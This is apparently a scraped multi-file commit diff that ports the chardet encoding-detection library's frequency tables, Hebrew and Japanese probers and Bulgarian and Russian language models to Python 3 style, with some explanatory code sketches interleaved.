######################### END LICENSE BLOCK #########################
# EUCTW frequency table
# Converted from big5 work
# by Taiwan's Mandarin Promotion Council
# Converted from big5 work
# by Taiwan's Mandarin Promotion Council
# <http:#www.edu.tw:81/mandr/>
# 128 --> 0.42261
@ -38,15 +38,15 @@
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) = 2.98
# Random Distribution Ratio = 512/(5401-512) = 0.105
#
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
EUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75
# Char to FreqOrder table ,
# Char to FreqOrder table ,
EUCTW_TABLE_SIZE = 8102
EUCTWCharToFreqOrder = ( \
EUCTWCharToFreqOrder = (
1,1800,1506, 255,1431, 198, 9, 82, 6,7310, 177, 202,3615,1256,2808, 110, # 2742
3735, 33,3241, 261, 76, 44,2113, 16,2931,2184,1176, 659,3868, 26,3404,2643, # 2758
1198,3869,3313,4060, 410,2211, 302, 590, 361,1963, 8, 204, 58,4296,7311,1931, # 2774
@ -424,3 +424,5 @@ EUCTWCharToFreqOrder = ( \
8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,8704,8705,8706,8707,8708,8709, # 8710
8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,8720,8721,8722,8723,8724,8725, # 8726
8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,8736,8737,8738,8739,8740,8741) # 8742
# flake8: noqa
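# A worked check of the ratios quoted in the header above (plain arithmetic;
# 0.74851 is read as the coverage of the most frequent characters, per the
# comments):
ideal_ratio = 0.74851 / (1 - 0.74851)    # ~2.98, as stated
typical_ratio = 0.25 * ideal_ratio       # ~0.74, rounded to the 0.75 used for
                                         # EUCTW_TYPICAL_DISTRIBUTION_RATIO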
View File
@ -25,10 +25,10 @@
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import EUCTWDistributionAnalysis
from mbcssm import EUCTWSMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCTWDistributionAnalysis
from .mbcssm import EUCTWSMModel
class EUCTWProber(MultiByteCharSetProber):
def __init__(self):
View File
@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -36,14 +36,14 @@
#
# Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79
# Random Distribution Ratio = 512 / (3755 - 512) = 0.157
#
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9
GB2312_TABLE_SIZE = 3760
GB2312CharToFreqOrder = ( \
GB2312CharToFreqOrder = (
1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205,
2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842,
2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409,
@ -469,3 +469,4 @@ GB2312CharToFreqOrder = ( \
5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978,
4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767)
# flake8: noqa
View File
@ -25,10 +25,10 @@
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import GB2312DistributionAnalysis
from mbcssm import GB2312SMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import GB2312DistributionAnalysis
from .mbcssm import GB2312SMModel
class GB2312Prober(MultiByteCharSetProber):
def __init__(self):
View File
@ -13,20 +13,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetprober import CharSetProber
import constants
from .charsetprober import CharSetProber
from .constants import eNotMe, eDetecting
from .compat import wrap_ord
# This prober doesn't actually recognize a language or a charset.
# It is a helper prober for the use of the Hebrew model probers
@ -35,40 +36,40 @@ import constants
#
# Four main charsets exist in Hebrew:
# "ISO-8859-8" - Visual Hebrew
# "windows-1255" - Logical Hebrew
# "windows-1255" - Logical Hebrew
# "ISO-8859-8-I" - Logical Hebrew
# "x-mac-hebrew" - ?? Logical Hebrew ??
#
# Both "ISO" charsets use a completely identical set of code points, whereas
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# "windows-1255" and "x-mac-hebrew" are two different proper supersets of
# these code points. windows-1255 defines additional characters in the range
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific
# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6.
# x-mac-hebrew defines similar additional code points but with a different
# x-mac-hebrew defines similar additional code points but with a different
# mapping.
#
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# As far as an average Hebrew text with no diacritics is concerned, all four
# charsets are identical with respect to code points. Meaning that for the
# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters
# (including final letters).
#
# The dominant difference between these charsets is their directionality.
# "Visual" directionality means that the text is ordered as if the renderer is
# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
# not aware of a BIDI rendering algorithm. The renderer sees the text and
# draws it from left to right. The text itself when ordered naturally is read
# backwards. A buffer of Visual Hebrew generally looks like so:
# "[last word of first line spelled backwards] [whole line ordered backwards
# and spelled backwards] [first word of first line spelled backwards]
# and spelled backwards] [first word of first line spelled backwards]
# [end of line] [last word of second line] ... etc' "
# adding punctuation marks, numbers and English text to visual text is
# naturally also "visual" and from left to right.
#
#
# "Logical" directionality means the text is ordered "naturally" according to
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# the order it is read. It is the responsibility of the renderer to display
# the text from right to left. A BIDI algorithm is used to place general
# punctuation marks, numbers and English text in the text.
#
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# Texts in x-mac-hebrew are almost impossible to find on the Internet. From
# what little evidence I could find, it seems that its general directionality
# is Logical.
#
@ -76,17 +77,17 @@ import constants
# charsets:
# Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are
# backwards while line order is natural. For charset recognition purposes
# the line order is unimportant (In fact, for this implementation, even
# the line order is unimportant (In fact, for this implementation, even
# word order is unimportant).
# Logical Hebrew - "windows-1255" - normal, naturally ordered text.
#
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be
# specifically identified.
# "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew
# that contain special punctuation marks or diacritics is displayed with
# some unconverted characters showing as question marks. This problem might
# be corrected using another model prober for x-mac-hebrew. Due to the fact
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# that x-mac-hebrew texts are so rare, writing another model prober isn't
# worth the effort and performance hit.
#
#### The Prober ####
@ -126,28 +127,31 @@ import constants
# charset identified, either "windows-1255" or "ISO-8859-8".
# windows-1255 / ISO-8859-8 code points of interest
FINAL_KAF = '\xea'
NORMAL_KAF = '\xeb'
FINAL_MEM = '\xed'
NORMAL_MEM = '\xee'
FINAL_NUN = '\xef'
NORMAL_NUN = '\xf0'
FINAL_PE = '\xf3'
NORMAL_PE = '\xf4'
FINAL_TSADI = '\xf5'
NORMAL_TSADI = '\xf6'
FINAL_KAF = 0xea
NORMAL_KAF = 0xeb
FINAL_MEM = 0xed
NORMAL_MEM = 0xee
FINAL_NUN = 0xef
NORMAL_NUN = 0xf0
FINAL_PE = 0xf3
NORMAL_PE = 0xf4
FINAL_TSADI = 0xf5
NORMAL_TSADI = 0xf6
# Minimum Visual vs Logical final letter score difference.
# If the difference is below this, don't rely solely on the final letter score distance.
# If the difference is below this, don't rely solely on the final letter score
# distance.
MIN_FINAL_CHAR_DISTANCE = 5
# Minimum Visual vs Logical model score difference.
# If the difference is below this, don't rely at all on the model score distance.
# If the difference is below this, don't rely at all on the model score
# distance.
MIN_MODEL_DISTANCE = 0.01
VISUAL_HEBREW_NAME = "ISO-8859-8"
LOGICAL_HEBREW_NAME = "windows-1255"
class HebrewProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
@ -159,8 +163,8 @@ class HebrewProber(CharSetProber):
self._mFinalCharLogicalScore = 0
self._mFinalCharVisualScore = 0
# The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate a word
# delimiter at the beginning of the data
# mPrev and mBeforePrev are initialized to space in order to simulate
# a word delimiter at the beginning of the data
self._mPrev = ' '
self._mBeforePrev = ' '
# These probers are owned by the group prober.
@ -170,49 +174,52 @@ class HebrewProber(CharSetProber):
self._mVisualProber = visualProber
def is_final(self, c):
return c in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, FINAL_TSADI]
return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE,
FINAL_TSADI]
def is_non_final(self, c):
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters causing
# the Non-Final tsadi to appear at an end of a word even though this is not
# the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being a
# good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' for
# example legally end with a Non-Final Pe or Kaf. However, the benefit of
# these letters as Non-Final letters outweighs the damage since these words
# are quite rare.
return c in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
# The normal Tsadi is not a good Non-Final letter due to words like
# 'lechotet' (to chat) containing an apostrophe after the tsadi. This
# apostrophe is converted to a space in FilterWithoutEnglishLetters
# causing the Non-Final tsadi to appear at an end of a word even
# though this is not the case in the original text.
# The letters Pe and Kaf rarely display a related behavior of not being
# a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak'
# for example legally end with a Non-Final Pe or Kaf. However, the
# benefit of these letters as Non-Final letters outweighs the damage
# since these words are quite rare.
return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE]
def feed(self, aBuf):
# Final letter analysis for logical-visual decision.
# Look for evidence that the received buffer is either logical Hebrew or
# visual Hebrew.
# Look for evidence that the received buffer is either logical Hebrew
# or visual Hebrew.
# The following cases are checked:
# 1) A word longer than 1 letter, ending with a final letter. This is an
# indication that the text is laid out "naturally" since the final letter
# really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In normal
# Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, should not end with
# the Non-Final form of that letter. Exceptions to this rule are mentioned
# above in isNonFinal(). This is an indication that the text is laid out
# backwards. +1 for visual score
# 3) A word longer than 1 letter, starting with a final letter. Final letters
# should not appear at the beginning of a word. This is an indication that
# the text is laid out backwards. +1 for visual score.
#
# The visual score and logical score are accumulated throughout the text and
# are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since that case
# is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with spaces)
# so the word boundary detection works properly. [MAP]
# 1) A word longer than 1 letter, ending with a final letter. This is
# an indication that the text is laid out "naturally" since the
# final letter really appears at the end. +1 for logical score.
# 2) A word longer than 1 letter, ending with a Non-Final letter. In
# normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi,
# should not end with the Non-Final form of that letter. Exceptions
# to this rule are mentioned above in isNonFinal(). This is an
# indication that the text is laid out backwards. +1 for visual
# score
# 3) A word longer than 1 letter, starting with a final letter. Final
# letters should not appear at the beginning of a word. This is an
# indication that the text is laid out backwards. +1 for visual
# score.
#
# The visual score and logical score are accumulated throughout the
# text and are finally checked against each other in GetCharSetName().
# No checking for final letters in the middle of words is done since
# that case is not an indication for either Logical or Visual text.
#
# We automatically filter out all 7-bit characters (replace them with
# spaces) so the word boundary detection works properly. [MAP]
if self.get_state() == constants.eNotMe:
if self.get_state() == eNotMe:
# Both model probers say it's not them. No reason to continue.
return constants.eNotMe
return eNotMe
aBuf = self.filter_high_bit_only(aBuf)
@ -220,23 +227,27 @@ class HebrewProber(CharSetProber):
if cur == ' ':
# We stand on a space - a word just ended
if self._mBeforePrev != ' ':
# next-to-last char was not a space so self._mPrev is not a 1 letter word
# next-to-last char was not a space so self._mPrev is not a
# 1 letter word
if self.is_final(self._mPrev):
# case (1) [-2:not space][-1:final letter][cur:space]
self._mFinalCharLogicalScore += 1
elif self.is_non_final(self._mPrev):
# case (2) [-2:not space][-1:Non-Final letter][cur:space]
# case (2) [-2:not space][-1:Non-Final letter][
# cur:space]
self._mFinalCharVisualScore += 1
else:
# Not standing on a space
if (self._mBeforePrev == ' ') and (self.is_final(self._mPrev)) and (cur != ' '):
if ((self._mBeforePrev == ' ') and
(self.is_final(self._mPrev)) and (cur != ' ')):
# case (3) [-2:space][-1:final letter][cur:not space]
self._mFinalCharVisualScore += 1
self._mBeforePrev = self._mPrev
self._mPrev = cur
# Forever detecting, till the end or until both model probers return eNotMe (handled above)
return constants.eDetecting
# Forever detecting, till the end or until both model probers return
# eNotMe (handled above)
return eDetecting
def get_charset_name(self):
# Make the decision: is it Logical or Visual?
@ -248,22 +259,25 @@ class HebrewProber(CharSetProber):
return VISUAL_HEBREW_NAME
# It's not dominant enough, try to rely on the model scores instead.
modelsub = self._mLogicalProber.get_confidence() - self._mVisualProber.get_confidence()
modelsub = (self._mLogicalProber.get_confidence()
- self._mVisualProber.get_confidence())
if modelsub > MIN_MODEL_DISTANCE:
return LOGICAL_HEBREW_NAME
if modelsub < -MIN_MODEL_DISTANCE:
return VISUAL_HEBREW_NAME
# Still no good, back to final letter distance, maybe it'll save the day.
# Still no good, back to final letter distance, maybe it'll save the
# day.
if finalsub < 0.0:
return VISUAL_HEBREW_NAME
# (finalsub > 0 - Logical) or (don't know what to do) default to Logical.
# (finalsub > 0 - Logical) or (don't know what to do) default to
# Logical.
return LOGICAL_HEBREW_NAME
def get_state(self):
# Remain active as long as any of the model probers are active.
if (self._mLogicalProber.get_state() == constants.eNotMe) and \
(self._mVisualProber.get_state() == constants.eNotMe):
return constants.eNotMe
return constants.eDetecting
if (self._mLogicalProber.get_state() == eNotMe) and \
(self._mVisualProber.get_state() == eNotMe):
return eNotMe
return eDetecting
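# A condensed, standalone sketch of the final-letter voting rule documented
# above (cases 1 and 3 only; the real prober also handles case 2 and the
# model-score fallback). Words are given as sequences of byte values:
FINAL_LETTERS = (FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, FINAL_TSADI)

def final_letter_votes(words):
    logical = visual = 0
    for word in words:
        if len(word) < 2:
            continue                  # 1-letter words carry no evidence
        if word[-1] in FINAL_LETTERS:
            logical += 1              # final form at the end: natural order
        elif word[0] in FINAL_LETTERS:
            visual += 1               # final form at the start: reversed text
    return logical, visual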
View File
@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -28,7 +28,7 @@
# Sampling from about 20M text materials include literature and computer technology
#
# Japanese frequency table, applied to both S-JIS and EUC-JP
# They are sorted in order.
# They are sorted in order.
# 128 --> 0.77094
# 256 --> 0.85710
@ -38,15 +38,15 @@
#
# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58
# Random Distribution Ratio = 512 / (2965+62+83+86-512) = 0.191
#
# Typical Distribution Ratio, 25% of IDR
#
# Typical Distribution Ratio, 25% of IDR
JIS_TYPICAL_DISTRIBUTION_RATIO = 3.0
# Char to FreqOrder table ,
# Char to FreqOrder table ,
JIS_TABLE_SIZE = 4368
JISCharToFreqOrder = ( \
JISCharToFreqOrder = (
40, 1, 6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, # 16
3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247, 18, 179,5071, 856,1661, # 32
1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, # 48
@ -565,3 +565,5 @@ JISCharToFreqOrder = ( \
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272
# flake8: noqa
View File
@ -13,19 +13,19 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
from .compat import wrap_ord
NUM_OF_CATEGORY = 6
DONT_KNOW = -1
@ -34,7 +34,7 @@ MAX_REL_THRESHOLD = 1000
MINIMUM_DATA_THRESHOLD = 4
# This is hiragana 2-char sequence table, the number in each cell represents its frequency category
jp2CharContext = ( \
jp2CharContext = (
(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1),
(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4),
(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2),
@ -125,24 +125,31 @@ class JapaneseContextAnalysis:
self.reset()
def reset(self):
self._mTotalRel = 0 # total sequence received
self._mRelSample = [0] * NUM_OF_CATEGORY # category counters, each interger counts sequence in its category
self._mNeedToSkipCharNum = 0 # if last byte in current buffer is not the last byte of a character, we need to know how many bytes to skip in next buffer
self._mLastCharOrder = -1 # The order of previous char
self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made
self._mTotalRel = 0 # total sequence received
# category counters, each integer counts sequences in its category
self._mRelSample = [0] * NUM_OF_CATEGORY
# if last byte in current buffer is not the last byte of a character,
# we need to know how many bytes to skip in next buffer
self._mNeedToSkipCharNum = 0
self._mLastCharOrder = -1 # The order of previous char
# If this flag is set to True, detection is done and conclusion has
# been made
self._mDone = False
def feed(self, aBuf, aLen):
if self._mDone: return
if self._mDone:
return
# The buffer we got is byte oriented, and a character may span in more than one
# buffers. In case the last one or two byte in last buffer is not complete, we
# record how many byte needed to complete that character and skip these bytes here.
# We can choose to record those bytes as well and analyse the character once it
# is complete, but since a character will not make much difference, by simply skipping
# buffers. In case the last one or two byte in last buffer is not
# complete, we record how many byte needed to complete that character
# and skip these bytes here. We can choose to record those bytes as
# well and analyse the character once it is complete, but since a
# character will not make much difference, simply skipping
# this character will simplify our logic and improve performance.
i = self._mNeedToSkipCharNum
while i < aLen:
order, charLen = self.get_order(aBuf[i:i+2])
order, charLen = self.get_order(aBuf[i:i + 2])
i += charLen
if i > aLen:
self._mNeedToSkipCharNum = i - aLen
@ -151,7 +158,7 @@ class JapaneseContextAnalysis:
if (order != -1) and (self._mLastCharOrder != -1):
self._mTotalRel += 1
if self._mTotalRel > MAX_REL_THRESHOLD:
self._mDone = constants.True
self._mDone = True
break
self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1
self._mLastCharOrder = order
@ -166,45 +173,55 @@ class JapaneseContextAnalysis:
else:
return DONT_KNOW
def get_order(self, aStr):
def get_order(self, aBuf):
return -1, 1
class SJISContextAnalysis(JapaneseContextAnalysis):
def get_order(self, aStr):
if not aStr: return -1, 1
def __init__(self):
self.charset_name = "SHIFT_JIS"
def get_charset_name(self):
return self.charset_name
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
if ((aStr[0] >= '\x81') and (aStr[0] <= '\x9F')) or \
((aStr[0] >= '\xE0') and (aStr[0] <= '\xFC')):
first_char = wrap_ord(aBuf[0])
if ((0x81 <= first_char <= 0x9F) or (0xE0 <= first_char <= 0xFC)):
charLen = 2
if (first_char == 0x87) or (0xFA <= first_char <= 0xFC):
self.charset_name = "CP932"
else:
charLen = 1
# return its order if it is hiragana
if len(aStr) > 1:
if (aStr[0] == '\202') and \
(aStr[1] >= '\x9F') and \
(aStr[1] <= '\xF1'):
return ord(aStr[1]) - 0x9F, charLen
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 0x82) and (0x9F <= second_char <= 0xF1):
return second_char - 0x9F, charLen
return -1, charLen
class EUCJPContextAnalysis(JapaneseContextAnalysis):
def get_order(self, aStr):
if not aStr: return -1, 1
def get_order(self, aBuf):
if not aBuf:
return -1, 1
# find out current char's byte length
if (aStr[0] == '\x8E') or \
((aStr[0] >= '\xA1') and (aStr[0] <= '\xFE')):
first_char = wrap_ord(aBuf[0])
if (first_char == 0x8E) or (0xA1 <= first_char <= 0xFE):
charLen = 2
elif aStr[0] == '\x8F':
elif first_char == 0x8F:
charLen = 3
else:
charLen = 1
# return its order if it is hiragana
if len(aStr) > 1:
if (aStr[0] == '\xA4') and \
(aStr[1] >= '\xA1') and \
(aStr[1] <= '\xF3'):
return ord(aStr[1]) - 0xA1, charLen
if len(aBuf) > 1:
second_char = wrap_ord(aBuf[1])
if (first_char == 0xA4) and (0xA1 <= second_char <= 0xF3):
return second_char - 0xA1, charLen
return -1, charLen
# flake8: noqa
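# A minimal sketch of feeding the context analyser directly, assuming the
# vendored package layout (import paths may differ); reset() is called
# explicitly because the probers, not the constructor, normally do that:
from thirdparty.chardet.jpcntx import SJISContextAnalysis

ctx = SJISContextAnalysis()
ctx.reset()
buf = b'\x82\xa0\x82\xa2\x82\xa4'    # three hiragana encoded as Shift_JIS
ctx.feed(buf, len(buf))
print(ctx.got_enough_data())         # False until enough 2-char sequences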
View File
@ -13,30 +13,28 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually do not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
# this table is modified base on win1251BulgarianCharToOrderMap, so
# this table is modified based on win1251BulgarianCharToOrderMap, so
# only number <64 is sure valid
Latin5_BulgarianCharToOrderMap = ( \
Latin5_BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -55,7 +53,7 @@ Latin5_BulgarianCharToOrderMap = ( \
62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0
)
win1251BulgarianCharToOrderMap = ( \
win1251BulgarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -74,13 +72,13 @@ win1251BulgarianCharToOrderMap = ( \
7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 96.9392%
# first 1024 sequences:3.0618%
# rest sequences: 0.2992%
# negative sequences: 0.0020%
BulgarianLangModel = ( \
# negative sequences: 0.0020%
BulgarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2,
3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1,
@ -211,18 +209,21 @@ BulgarianLangModel = ( \
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
)
Latin5BulgarianModel = { \
Latin5BulgarianModel = {
'charToOrderMap': Latin5_BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
Win1251BulgarianModel = { \
Win1251BulgarianModel = {
'charToOrderMap': win1251BulgarianCharToOrderMap,
'precedenceMatrix': BulgarianLangModel,
'mTypicalPositiveRatio': 0.969392,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
# flake8: noqa
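
Each model dictionary above is plain data: a 256-entry charToOrderMap for one code page, the shared 64x64 precedenceMatrix of two-letter sequence likelihoods, a typical positive ratio, and the target charset name. They are consumed by SingleByteCharSetProber, whose updated constructor appears later in this diff. A hedged wiring sketch, with module paths assumed from the usual chardet layout and a made-up sample string:

    from chardet.sbcharsetprober import SingleByteCharSetProber
    from chardet.langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel

    # Hypothetical sample text, encoded in one of the two candidate code pages.
    sample = u"\u0411\u044a\u043b\u0433\u0430\u0440\u0441\u043a\u0438 \u0442\u0435\u043a\u0441\u0442".encode("windows-1251")

    for model in (Latin5BulgarianModel, Win1251BulgarianModel):
        prober = SingleByteCharSetProber(model)
        prober.feed(sample)
        print("%s %.3f" % (prober.get_charset_name(), prober.get_confidence()))
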

View File

@ -13,23 +13,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = ( \
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -48,7 +46,7 @@ KOI8R_CharToOrderMap = ( \
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = ( \
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -67,7 +65,7 @@ win1251_CharToOrderMap = ( \
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = ( \
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
